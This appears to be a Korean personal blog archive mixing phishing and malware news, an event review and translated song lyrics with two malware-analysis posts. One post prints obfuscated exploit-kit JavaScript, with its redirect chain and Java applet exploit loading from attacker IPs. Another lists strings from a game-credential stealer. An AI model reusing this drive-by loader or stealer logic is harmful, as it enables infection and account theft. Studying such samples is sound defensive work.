posted by Kwan's 2013.09.17 14:54


Google Docs으로 부터 여러분에게 보내진 “보안문서(Secure Document)”인척 하는 대규모의 피싱 공격이 이번 주 동안 유행하였습니다.

보안업계에 종사하는 우리 같은 사람들은 놀라지 않을지도 모르지만, 피싱 공격들은 전통적인 방어를 피하는 매우 효과적인 방법들 중의 하나임을 스스로 증명하고 있습니다.

많은 기관들이 Google 클라우드로 옮겨감에 따라, 이런 류의 피싱 미끼는 계속해서 범죄용으로 사용되는 결과를 낳을 것입니다.

그 이메일은 다음과 같습니다.:

안녕하세요.

당신의 금융기관에서 Google Docs를 사용한 보안 문서를 보내었습니다.
문서를 보기 위해 Google Docs 웹페이지를 방문하려면 아래 링크를 클릭하십시오.
여기를 클릭하세요. 문서는 중요하다고 되어 있습니다.

수고하십시오.
The Gmail Team

피싱 이메일이 아주 특별한 것은 아니지만, 이 피싱 이메일은 제 눈에 걸립니다. 게다가 다소 그럴 듯한 미끼이고, 모두가 속을 수 있는 익스플로잇 입니다.

만약 그 링크를 클릭하면, 여러분은 대만에서 호스팅되고 있는 피싱 페이지를 보게 됩니다.

그 페이지는 여러분의 Google 계정정보를 요청할 뿐만 아니라, Yahoo!, Outlook.com, Hotmail, AOL, Comcast, Verizon, 163.com 그리고 기타 다른 이메일 계정으로도 접속 가능하다고 말합니다.

물론, 이 입력폼을 채우면 당장 낭패를 보게 될 것입니다. 여러분의 상세정보는 해커들이 바라는 목적이 무엇이든지 간에 감염된 서버로 보내집니다.

여러분은 이렇게 생각할지도 모릅니다. “그래서 뭘? 내 Gmail은 나의 국적/삶/경력을 파괴할 비밀의 전부는 아니거든.”

그러나 당신이 틀렸다는 것을 곧 알게 될 것입니다. 왜냐하면 당신 이메일은 당신의 온라인 신원 대부분을 파헤치는 열쇠이기 때문입니다.

당신의 은행계좌 비밀번호를 잊어버렸습니까? 걱정하지 마세요, 그들이 당신에게 비밀번호 리셋 링크를 이메일로 보낼 것입니다.

여러분의 회사가 클라우드 서비스를 이용합니까? 여러분의 이메일 계정이 이런 시스템에 접속하는 열쇠인 것 같습니다.

놀랍게도 피싱은 성공한 기술입니다.

그렇다면, 세상에서 가장 강력한 미디어 조직들 중 몇 곳을 감염시킬 수 있는 기술적인 재능(피싱)을 지닌 시리아전자군대(Syrian Electronic Army)에게 물어 보세요.

IT 관리자로서, 이것은 여러분의 직원들에게 위험을 가르치는 기회입니다.

이것이 유행하고 있는 피싱들 중 가장 설득력 있는 것이 아닐지도 모르지만, 여러분의 직원을 교육하는 유용한 도구입니다.

많은 기업들이 Google이나 기타 클라우드 서비스 제공업체를 이용하여 중요한 IT 서비스를 제공하고 있습니다. 언뜻 보기에 이것은 매우 믿음직스러울 수 있습니다.

희생자가 되지 않으려면 무엇을 해야 할까요? 나는 모든 중요한 서비스에 대해 나의 브라우저에 바로가기를 만듭니다.

만약 나의 이메일이나 은행 또는 다른 온라인 서비스에 접속할 필요가 있다면, 그런 링크를 클릭하지 않고, 바로 즐겨찾기를 클릭하는 것입니다.


posted by Kwan's 2013.05.09 01:35

4월 어느날 우연히 페이스북으로 아이디어 하모니라는것을 하게된다고 해서 저도 참가해보았습니다.



1부 - 대학생에게 들려주는 재미있는 마케팅이라는 주제로 강연을 해주셨습니다.

사실 저는 마케팅에 대해서는 전혀 모르는 상황에서 마케팅이 무엇인가 궁금하기도 하고 해서 신청을 하였으나.... 역시 마케팅은 아무나 하는게 아니었습니다... 용어도 생소하고 그 전에는 마케팅이라 하면 고객들에게 물건만 잘 팔면 되는 줄 알았는데... 이렇게 치밀한 계획을 세우고 시장 조사도 하면서 생각도 많이 하게 되는것인줄은 정말 몰랐습니다.. 

마케팅을 하시는 분이 정말 존경스러웠습니다.



열심히 강의 해주시는 장권영 강사님 이십니다.


이런 강의 중에 제일 기억에 남는것이 있었습니다. 바로 기업에서 소비자에게 다가가는 마케팅 방법 이었습니다.


기업들은 마케팅에 대한 관심과 투자는 엄청나다고 합니다. 하지만 마케팅은 어디서나 좋은건 아닙니다.

복합적인 요소에 따라 득이 될 수도 실이 될 수도 있습니다.


이와 동시에 기업은 고객의 관점에서 생각을 해야 합니다. 자기 회사의 이득도 좋지만 회사가 살려면 고객도 있다는 점을 잊어서는 안됩니다.


제일 마음에 와닿았던것은 바로 브랜딩 마케팅 전략이었습니다.

브랜딩 마켓팅은 누구나 할수 있습니다. 하지만 이를 위해서는 언제나 다른 관점에서 보는 것이 필요 합니다.

  1. 브랜드 identity을 전달하기 위해 개발된 표현물

  2. 브랜드가 제안하는 가치, 기능적 , 자기 표현적, 감성적

  3. 경쟁 브랜드 대지 적극적으로 커뮤니케이션 하고자 하는 차별적 속성

  4. 일관성 있게 기획을 한다.


이렇게 단순하게 브랜드를 만드는게 중요한게 아니라 이것을 어떻게 유지보수하느냐가 중요합니다.

항상 고객의 관점에서 생각하며 성공하면 끝나는게 아닌 끝임없는 생각과 개발이 필요한게 마케팅 인거 같습니다.


2부 - 대학 생활을 더 체계적으로! 마인드 맵 활용법




휴식시간이 지난 이후 대학 생활을 더 체계적으로! 마인드 맵 활용법 이라는 주제로 해서 알마인드라는 프로그램을 배웠습니다.


마인드맵 하니 어릴적에 종에 놓고 막 이어나가던게 생각났습니다. 알마인드 역시 이런 경우와 같았습니다.

그래서 더욱 유용한 프로그램이라는걸 알았습니다. 내가 생각나는것을 적어서 이어가다보면 내가 무슨 생각을 한게 한 눈에 보였습니다.


제일 유용했던건 알 마인드를 소개해주신 이후 알마인드를 이용한 게임이었습니다.

제목이 가물가물 하지만 누구든지 3단계를 걸치면 세계 어느누구랑도 친할 수 있다는 게임 입니다.

게임을 하면서 하니 알마인드의 기능이 보이기 시작했습니다. 설명 보다는 역시 보고 느끼고 상품이 있어야 열심히 하게 되네요!


하지만 아직은 알마인드라는 프로그램이 다른 외국 프로그램에 비해 알려진것이 아닙니다. 그러나 언젠가는 마인드 맵 하면 알 마인드! 라고 할 수 있을 때까지 노력하신다고 하시니 관심을 가지고 지켜봐야겠습니다.


어느 프로그램이나 다 장, 단점이 있다고 생각합니다. 그래도 오늘도 노력하시는 개발자 분들이 있기에 언젠가는 장점만 있는 프로그램이 될 수 있을꺼라 확신 합니다..




마지막으로 강연이 모두 끝난 후 찍은 단체 사진!!!!

토요일에도 불과 하고 많은 분들이 참여했습니다. 서포터즈 1기로서는 저 혼자였네요 .......

새로운 공부를 하였던 좋은 하루 였습니다. 다음에도 좋은 기회가 있으면 또 참여 하고 싶습니다.


PS. 1기 형, 누나들 보고 싶어요 ! 언제 얼굴을 볼 수 있을까요???


posted by Kwan's 2013.01.22 18:45


소포스랩은 보안 메시지처럼 가장하여 이메일을 통해 스팸메일로 보내진 광범위한 맬웨어 공격을 차단하고 있습니다.

“보안 메시지가 도착했습니다.”라는 제목을 가진 그 이메일은 수신인을 속여 첨부된 ZIP파일을 열도록 합니다.

하지만, <securedoc.zip>이란 ZIP파일에 포함된 것은 소포스 제품이 Troj/Zbot-DPM로 감지하는 트로이목마입니다.

다음은 전형적인 메시지를 보여줍니다.(전체 버전을 보시려면 이미지를 클릭하세요.)

보안 메시지가 도착했습니다.

SECUREDOC이란 첨부파일을 열어서 보안 메시지를 읽어주세요.여러분은 그 파일을 열거나 여러분의 컴퓨터에 다운로드 하게 될 것입니다. 제일 좋은 방법은, 우선 그 파일을 다운로드한 다음에 그 파일을 여는겁니다.

이 메시지의 타당성에 대해 걱정한다면, 발신인에게 직접 연락하세요.
Key 이메일 암호화 서비스에 대한 문의사항이 있으시면, 기술지원 888.764.7941로 연락하세요.

처음 사용자 - 첨부파일을 연 다음 등록을 하셔야 합니다.
Help - https://mailsafe.keybank.com/websafe/help?topic=RegEnvelope
아이언포트 암호화(IronPort Encryption)란 - https://mailsafe.keybank.com/websafe/about

Zeus라고도 알려진 악명 높은 Zbot 계열의 맬웨어는 여러분의 컴퓨터를 하이재킹하여 범죄용 봇넷의 일부로 만들 수 있습니다. 지난 몇 년간 사이버범죄자들은 서로 다른 버전의 Zbot을 사용하여 온라인 뱅킹 계좌에서 돈을 훔치고, 소셜 네트워킹 사이트의 로그인 정보와 이메일/FTP 정보 등을 훔쳤습니다.

수신인들이 왜 위에 보여준 것과 같은 보안 메시지를 실제 받았다고 믿게 되는지, 그리고 어리석게도 그 첨부파일을 열어서 그 안에 포함된 악성 실행파일을 실행시키게 되는지 이해하는 것은 쉽습니다.

현재 소포스랩은 이와 같은 메시지들이 스팸메일로 많이 보내지고 있는 것을 보고 있습니다. 그래서 여러분이 안티스팸이나 안티바이러스 제품이 업데이트되었는지, 그리고 이런 위협을 감지할 수 있는지 확인하길 바랍니다.

그리고 확인되지 않은 이메일 첨부파일을 열기 전에는 항상 주의 하시기 바랍니다.

posted by Kwan's 2012.12.09 19:17

이번에 소개 해드릴 곡은 2012.10.15 에 발매된 Kelly Clarkson - Catch My Breath 입니다!


이 노래가 요즘에 한창 방영중인 K-Pop 스타 시즌2 에서 삽입곡으로 쓰여 졌던 곡입니다 !


또한 Stronger (What Doesn`t Kill You) 이후에 다시 한번 좋은 앨범을 발표 한거 같습니다 !


가수 : Kelly Clarkson

앨범 : 싱글앨범(Catch My Breath)

타이틀 곡 : Catch My Breath

장르팝 > 팝

발매정보 : 2012.10.15




I don't wanna be left behind

난 꼬래비가 되고 싶지 않아 

Distance was a friend of mine

차이는 내 친구 중 한명 

Catching breath in a web of lies

구라의 거미줄 속에서 숨을 죽이며 

I've spent most of my life

내 삶의 대부분을 보내왔지 

Riding waves, playing acrobat

파도를 타고, 곡예를 하며 

Shadowboxing the other half

혼자서 권투 연습을 하고 

Learning how to react

반응하는 법을 배우며 

I've spent most of my time 

내 시간의 대부분을 보내왔어

 

Catching my breath, letting it go, turning my cheek for the sake of this show

숨을 가다듬고, 몸을 맡겨, 다 견뎌낼 거야 이 쇼를 위해 

Now that you know, this is my life, I won't be told what's supposed to be right 

자 너도 알다시피, 이게 내 인생이야, 난 옳은 명령따윈 듣지 않아

 

Catch my breath, no one can hold me back, I ain't got time for that

숨을 가다듬어, 누구도 날 막을 수 없어 그럴 시간조차 없어 

Catch my breath, won't let them let me down, it's all so simple now 

숨을 가다듬어, 그들이 날 좌절시키는 꼴은 못봐, 이제 모든게 너무나 간단해 


Addicted to the love I found

내가 찾은 사랑에 중독되었어 

Heavy heart, now a weightless cloud

무거운 심정이었지만 이젠 솜털같은 구름일 뿐야 

Making time for the ones that count 

중요한 사람들과 시간을 보내며 

I'll spend the rest of my time 

난 남은 여생을 보낼거야 

Laughing hard with the windows down

창문을 닫고 크게 웃어재끼고 

Leaving footprints all over town

마을 곳곳 발자국을 남기며 

Keeping faith when it comes around

매일 매일 신념을 지키면서 

I will spent the rest of my life 

난 남은 여생을 보낼거야


Catching my breath, letting it go, turning my cheek for the sake of this show

숨을 가다듬고, 몸을 맡겨, 다 견뎌낼 거야 이 쇼를 위해 

Now that you know, this is my life, I won't be told what's supposed to be right 

자 너도 알다시피, 이게 내 인생이야, 난 옳은 명령따윈 듣지 않아 


Catch my breath, no one can hold me back, I ain't got time for that

숨을 가다듬어, 누구도 날 막을 수 없어 그럴 시간조차 없어 

Catch my breath, won't let them let me down, it's all so simple now 

숨을 가다듬어, 그들이 날 좌절시키는 꼴은 못봐, 이제 모든게 너무나 간단해

 

You helped me see

넌 내가 모든것에서 

The beauty in everything 

아름다움을 볼 수 있게 해줬어

 

Catching my breath, letting it go, turning my cheek for the sake of this show

숨을 가다듬고, 몸을 맡겨, 다 견뎌낼 거야 이 쇼를 위해 

Now that you know, this is my life, I won't be told what's supposed to be right 

자 너도 알다시피, 이게 내 인생이야, 난 옳은 명령따윈 듣지 않아


Catch My Breath 

숨을 가다듬어 


Catch my breath, no one can hold me back, I ain't got time for that

숨을 가다듬어, 누구도 날 막을 수 없어 그럴 시간조차 없어 

Catch my breath, won't let them let me down, it's all so simple now 

숨을 가다듬어, 그들이 날 좌절시키는 꼴은 못봐, 이제 모든게 너무나 간단해

 

Catching my breath, letting it go, turning my cheek for the sake of this show

숨을 가다듬고, 몸을 맡겨, 다 견뎌낼 거야 이 쇼를 위해 

Now that you know, this is my life, I won't be told what's supposed to be right 

자 너도 알다시피, 이게 내 인생이야, 난 옳은 명령따윈 듣지 않아

 

Catch my breath, no one can hold me back, I ain't got time for that

숨을 가다듬어, 누구도 날 막을 수 없어 그럴 시간조차 없어 

Catch my breath, won't let them let me down, it's all so simple now 

숨을 가다듬어, 그들이 날 좌절시키는 꼴은 못봐, 이제 모든게 너무나 간단해


posted by Kwan's 2012.12.04 20:05

한동안 글을 쓰다가 뜸하다가 올만에 다시한번 뮤비 글을 쓰게 되네요~


올만에 소개 드릴 노래는 신인 가수인 Bridgit Mendler - Ready or Not 입니다 !


원래는 싱글앨범으로 발매 되었지만 최근 정규 앨범 발매 후 많은 인기를 받고 있습니다 !



가수 : Bridgit Mendler

앨범 : 정규앨범(Hello My Name Is...)

타이틀 곡 : Ready or Not

장르팝 > 팝

 발매정보 : 2012.10.22




I'm the kind girl

Who doesn't say a world

Who sits at the curb

And waits for the world

But I'm about to break out , about to break out I'm like a crook tonight


I caught you staring at me

And I was thinking clearly

Now I'm like a bee

And I'm hunting for the honey

And I'm kinda shy but , you super fly yeah , I could be your kryptonite


Like Oh Oh Oh Oh Oh Oh

Light my heart up baby , like a matchstick

Oh Oh Oh Oh Oh Oh oOh

And hit the gas quick


Ready or Not , here I come

Where you at? The night is young

In the crowd the music's loud

But I will find you


(Chorus)

Ready or Not , here I come

I like your face, do you like my song ?

Just sing it la la la la la la la

And I find you

Ready or Not , Ready or Not


Hello , my name is (Bridgit)

Nice to meet you

I think you're famous

Where have I seen you ?

You'll be my William ,I'll be your Kate living like a fairytale


We could have a palace

right next to Oprah

37 Cars and a yacht

down in boca

Take me away , wherever you say , yeah we could be setting sail


Like Oh Oh Oh Oh Oh Oh

Light my heart up baby , like a matchstick

Oh Oh Oh Oh Oh Oh oOh

And hit the gas quick

(Chorus)


Ready or Not , here I come

I like your face, do you like my song ?

Just sing it la la la la la la la

And i find you

Ready or Not , Ready or Not


Ready or not , here I come , here I come

You're like a breath of fresh air in my lungs

You and me dance from the night to the dawn

Ready or not , here I come boy , It's on


Ready or not , here I come , here I come

You're like a breath of fresh air in my lungs

You and me dance from the night to the dawn

Ready or not , here I come boy , It's on


(Chorus)


Ready or Not , here I come

I like your face, do you like my song ?

Just sing it la la la la la la la

And I find you

Ready or Not

Ready or not

(You're like a breath of fresh air in my lungs)

Ready Or not

(ooooooh)

Ready or Not

(ready or not , whoa )

Ready or Not

(ready or not, ready or not or not or not not )

Ready or Not.


posted by Kwan's 2012.11.04 20:16

이번주 소개드릴 노래는 One Direction - Live While We're Young 입니다!


요즘에 사랑을 듬뿍듬뿍 받고 있는 꽃미남들이 있는 One Direction


꾸준히 음반을 발표하면서 외모와 노래에서도 사랑을 받는 그룹입니다!


AT40 차트에서 지난주 21위에서 18위로 상승하고 있는 중입니다 !


AT40 November 03, 2012 : http://www.at40.com/top-40/chart/23514


가수 : One Direction

앨범 : 싱글앨범

타이틀 곡 :Live While We're Young

장르팝 > 팝

 발매정보 : 2012.10.04


 


HEY GIRL I’M WAITING ON YA, I’M WAITING ON YA

이봐, 난 널 기다리고 있어, 기다리고 있어

COME ON AND LET ME SNEAK YOU OUT

이리와서 얼굴 좀 내밀어봐

AND HAVE A CELEBRATION, A CELEBRATION

그리고 파티를 하자, 파티를

THE MUSIC UP, THE WINDOWS DOWN.

음악은 올리고, 창문은 내리고

YEAH, WE’LL BE DOING WHAT WE DO

그래, 우린 하던대로 하는거야

JUST PRETENDING THAT WE’RE COOL

그냥 우리가 멋지다는 듯이 

AND WE KNOW IT TOO

그리고 우린 또 알고있잖아

YEAH, WE’LL KEEP DOING WHAT WE DO

그래 계속 이런식으로 할거라는 걸

JUST PRETENDING THAT WE’RE COOL

그냥 우리가 멋지다는 듯이

SO TONIGHT

그러니 오늘밤

 

<hook>

LET’S GO CRAZY, CRAZY, CRAZY TILL WE SEE THE SUN

미친듯이 열정적으로 신나게 가보자, 태양이 뜰때까지

I KNOW WE ONLY MET BUT LET’S PRETEND ITS LOVE

알아 우린 이제 만났지만 사랑이라고 생각해보자

AND NEVER NEVER NEVER STOP FOR ANYONE

그리고 절대 절대 절대 누구도 멈추지마

TONIGHT LET’S GET SOME

오늘밤 즐겁게 보내자

AND LIVE WHILE WE’RE YOUNG

그리고 젊을 때 즐기는거야

WOOOAH WOOAH WOOOAH OOOH OH

WOOOAH WOOAH WOOOAH OOOH OH

AND LIVE WHILE WE’RE YOUNG

그리고 젊을 때 즐기는거야

WOOOAH WOOAH WOOOAH OOOH OH

TONIGHT LET’S GET SOME

오늘밤 즐겁게 보내자

AND LIVE WHILE WE’RE YOUNG

그리고 젊을 때 즐기는거야

 

HEY GIRL IT’S NOW OR NEVER, IT’S NOW OR NEVER

이봐 지금이 아니면 끝인거야, 지금 아니면 끝

DON’T OVER THINK JUST LET IT GO

너무 많이 생각하지 말고 그냥 가보는거야

AND IF WE GET TOGETHER, G-GET TOGETHER

그리고 우리가 같이 있게 된다면

DON’T LET THE PICTURES LEAVE YOUR PHONE

그 사진들은 지우지 마

YEAH, WE’LL BE DOING WHAT WE DO

그래, 우린 하던대로 하는거야

JUST PRETENDING THAT WE’RE COOL

그냥 우리가 멋지다는 듯이

 

<hook>

  

AND GIRL, YOU AND I

너와 나

WE’RE ‘BOUT TO MAKE SOME MEMORIES TONIGHT

우린 오늘밤 추억을 좀 만들거야

I WANNA LIVE WHILE WE’RE YOUNG

난 젊을 때 즐기고 싶어

WE WANNA LIVE WHILE WE’RE YOUNG

우린 젊을 때 즐기는 거야

 

<Repeat X 2>

LET’S GO CRAZY, CRAZY, CRAZY TILL WE SEE THE SUN

미친듯이 열정적으로 신나게 가보자, 태양이 뜰때까지

I KNOW WE ONLY MET BUT LET’S PRETEND ITS LOVE

알아 우린 이제 만났지만 사랑이라고 생각해보자

AND NEVER NEVER NEVER STOP FOR ANYONE

그리고 절대 절대 절대 누구도 멈추지마

TONIGHT LET’S GET SOME

오늘밤 즐겁게 보내자

AND LIVE WHILE WE’RE YOUNG

그리고 젊을 때 즐기는거야

 

 <Repeat X 3>

WANNA LIVE, WANNA LIVE, WANNA LIVE (WHILE WE’RE YOUNG)

살고 싶어, 살고 싶어 즐겁게 (우리 젊을 때)

 

TONIGHT LET’S GET SOME

오늘밤 즐겁게 보내자

AND LIVE WHILE WE’RE YOUNG

그리고 젊을 때 즐기는거야


posted by Kwan's 2012.10.06 14:09

발견지 : http://www.icross.co.kr/

            →http://festival.cocobau.com/adm_site/e_show/e_th_ad.js

               →http://205.164.25.146/pic/img.js

               →http://205.164.25.146/pic/img.html (Yszz 1.5 vip)

                   → http://205.164.25.146/pic/swfobject.js

                   → http://205.164.25.146/pic/jpg.js

               →http://205.164.25.146/pic/css.html



var K4Er = "%";

var MDIxo=K4Er+"78"+K4Er+"6F";

var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";

var HHYWv=K4Er+"31"+"%59"+"%53";

var CvXWz="%7A"+"%7A"+"%31";

var JZyjl="%31"+"%6F"+"%78";

var ERb7H="%6F"+"%78";

var XGpwn2 =중략/

oI0Nl6jI2jrBT1pk+oIDWqCs=",HUx2Ydz="%64"+"

%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",

sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;

var kxin1s = "%53"+"%74"+"%72";

var B83pNx = kxin1s+"%69"+"%6e"+"%67";

var kxin2s = "%66"+"%72"+"%6f";

var kxin3s = "%6d"+"%43"+"%68";

var kxin4s = "%61"+"%72"+"%43";

var kxin5s = "%6f"+"%64"+"%65";

var WjuQFO = kxin2s+kxin3s+kxin4s+kxin5s;

var fxTmFiR = AVgHbu2f(B83pNx);

var xZW9RVt = AVgHbu2f(WjuQFO);

var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";

var x83QqGV = AVgHbu2f(sATWUn);

var SnDN8 = "%73"+"%74"+"%72";

var Z0b9A = "%63"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"+"%41"+"%74";

var fkPj5 = AVgHbu2f(SnDN8);

var hyYQ8 = AVgHbu2f(Z0b9A);

function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=fkPj5[hyYQ8](i++);switch(c>>4)

{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=fkPj5[hyYQ8](i++);char3=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,-중략--1,-1,-1);

HUx2Ydz=AVgHbu2f(HUx2Ydz);

function ZjykejU6(str)

{var YS1,YS2,YS3,YS4;/*Yszz 1.5 vip*/var i,len,out;

len=str.length;i=0;out = "";

while(i<len)

{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);

if(YS1==-1)

break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);

if(YS2==-1)

break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));

do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)

return out;

YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);

if(YS3==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));

do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)

return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}

return out}

function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)

{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}

if(w){return v.join('').substring(0,sl);}

else{return v.join('');}}

function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)

{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}

if(w){v[v.length]=len;}

return v;}

ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);

function kaixin(str,Udkz){if(str==""){return"";}

var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

sac5pxhFS=AVgHbu2f(sac5pxhFS);

JS0W=Cn6T4bG0znIi;

JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));

window[HUx2Ydz][sac5pxhFS](JS0W);


[생략]


   {

     var kaixin=document.createElement('applet');

     kaixin.width="1";

     kaixin.height="1";

     if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))

     {

       kaixin.archive="6UXSEJgm.jpg";

       kaixin.code="GondadGondadExp.class";

       kaixin.setAttribute("dota","http://69.46.87.99/img/jpg.css");

       document.body.appendChild(kaixin);

     }

     else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))

     {

       kaixin.archive="pvoszTc.jpg";

       kaixin.code="gond1723.Gondattack.class";

       kaixin.setAttribute("xiaomaolv","http://69.46.87.99/img/jpg.css");

       kaixin.setAttribute("bn","woyouyizhixiaomaolv");

       kaixin.setAttribute("si","conglaiyebuqi");

       kaixin.setAttribute("bs","748");

       document.body.appendChild(kaixin);

     }

     else

     {

       var ques3 = window.navigator.userAgent.toLowerCase();

       if (ques3.indexOf("msie 6") > -1)

       {

         ...cument.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://69.46.87.99/img/jpg.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'DB6Jm.jpg'></OBJECT>");

       }

       else

       {

         생략


         kaixiny.archive = "DB6Jm.jpg";

         kaixiny.code = "cve2012xxxx.Gondvv.class";

         kaixiny.setAttribute("xiaomaolv", "http://69.46.87.99/img/jpg.css");

         kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");

         kaixiny.setAttribute("si", "conglaiyebuqi");

         kaixiny.setAttribute("bs", "748");

         document.body.appendChild(kaixiny);

         

       }

       

     }

     

   }

   else

   {

     var pcss=navigator.userAgent.toLowerCase();

     var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

     if ((UaYcKzD2.indexOf('msie 8.0') > -1))

     {

       document.writeln("<iframe src=T0HE3R.html><\/iframe>");

       

     }

     else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))

     {

       document.writeln("<iframe src=6cxyl.html><\/iframe>");

       

     }

     

   }

   

 }


버전이 올라가면서 바뀌는 줄 알았는데 별달리 바뀐게 없는거 같이 느껴 졌다.

디코딩 했을때 역시 msie 버전 체크하는건 요새는 버전에 따라서 다시 연결되는게 대세인거 같다!

yszz 도 공다팩의 다동 처럼 어떤식으로 우회할지 조금 더 지켜봐야겠다!


posted by Kwan's 2012.09.17 18:56

Agent.aye         V3LTray.exe         nsavsvc.npc         ws2_32.dll  WSCEnumProtocols    % w s   o v e r   % w s     W i n S o c k e t A . d l l     WSCWriteProviderOrder   WSCInstallProvider  WSCGetProviderPath  ole32.dll   CoCreateGuid    SHLWAPI.dll StrStrIW    WSCDeinstallProvider    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\   LoadAppInit_DLLs    W i n S o c k e t A     %s.%s.tmp   \WindowsEx.dll  \WinSocketA.dll \lpk.dll    shlwapi.dll PathFileExistsA PromptOnSecureDesktop   EnableLUA   ConsentPromptBehaviorAdmin  SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System   RegCloseKey RegSetValueExA  RegOpenKeyA ADVAPI32.dll    %s\%s   \ws2helpxp.dll  \ws2help.dll    GetMessageA GetInputState   PostThreadMessageA  user32.dll


PASSWORD    World   USERNAME    \AionLog.ini    PM_shareReadWrite   var mystr =     b98tyu43213456789fucp569876 asd2g93kliportyt5uoanrbyvuc versionno=  firefoxpi=  strEncData= LoginID=    szPasswd    c   teencash.co.kr  userID= dk.halgame.com  &pwd=   game_id=13& aion.plaync.co.kr   pw  mabinogi.nexon.com  %*[^=]=%[^&]&%*[^=]=%[0-9a-zA-Z]    &password   accountName kr.battle.net   left    strLeftPw=  strLeftID=  right   no  &id=    dflogin=    info4=8 &sbanner=   nexon.com   %*[^=]=%[^&]&[0-9]  g_txtAuthNum=   gnxMapleOTPLoginAuthContainer   &strPassword=   &strEmail=  &keyname=   nxtURL= hangame.com %*[^=]=%[^&]&%*[^=]=%[^&]&  l_pwd=  l_id=   netmarble.net   l_domain=www.netmarble.net  %*[^=]=%[^&]&   usrid=  passwd= page_gameid=raycity page_gameid=fifaonline  page_gameid=www page_domain=pmang.com   pmang.com   this.AosGetText4 = function (elementObj){var e1=aos_get_text4(elementObj,1);var e2="";if(elementObj.value.length > 12){e2 = aos_get_text4(elementObj,2);}e2=aos_get_text2(elementObj);return [e1,e2];}/*------------------------------------------------------*/    this.AosGetText4 = function (elementObj)    function aos_get_text4(obj,order){var a="";try{a=MKD25.GetText4(obj,order);document.getElementById("sbanner").value=MKD25.GetText2(obj);return a;}catch(e){}return a;}/*------------*/  function aos_get_text4( obj, order )    NgbClientForm.AddChildForSubform( 'strLeftID', %s );

NgbClientForm.AddChildForSubform( 'strLeftPw', %s );


airyclient.exe LUOHAN  \LUOHANLog.ini  GetWindowTextA                                                                                                                                                                                                                                             ff2client.exe   FIFA    \FFLog.ini  InterlockedIncrement    kernel32.dll    iexplore.exe                                        dnf.exe                                             MapleStory.exe                                      lin.bin                                             ff2client.exe                                       heroes.exe                                          ExLauncher.exe                                      TERA.exe                                            OTP.exe                                             AION.bin                                            wow.exe                                             explorer.exe                                        raycity.exe         dkonline.exe        x2.exe              InphaseNXD.exe                                      AYAgent.aye                                         AYUpdSrv.aye                                        AYServiceNT.aye                                     AYRTSrv.aye                                         ALYac.aye                                           SystemMon.exe                                       SkyMon.exe                                          nsvmon.npc                                          nvc.npc                                             nvcagent.npc                                        Nsavsvc.npc                                         NaverAgent.exe                                      V3LTray.exe                                         V3LSvc.exe                                          V3Light.exe                                         SgSvc.exe                                           InjectWinSockServiceV3.exe                          aosrts.exe                                          aosbackv.exe                                        procscan                                            fairyclient.exe                                     aostray.exe                                         Diablo III.exe                                      

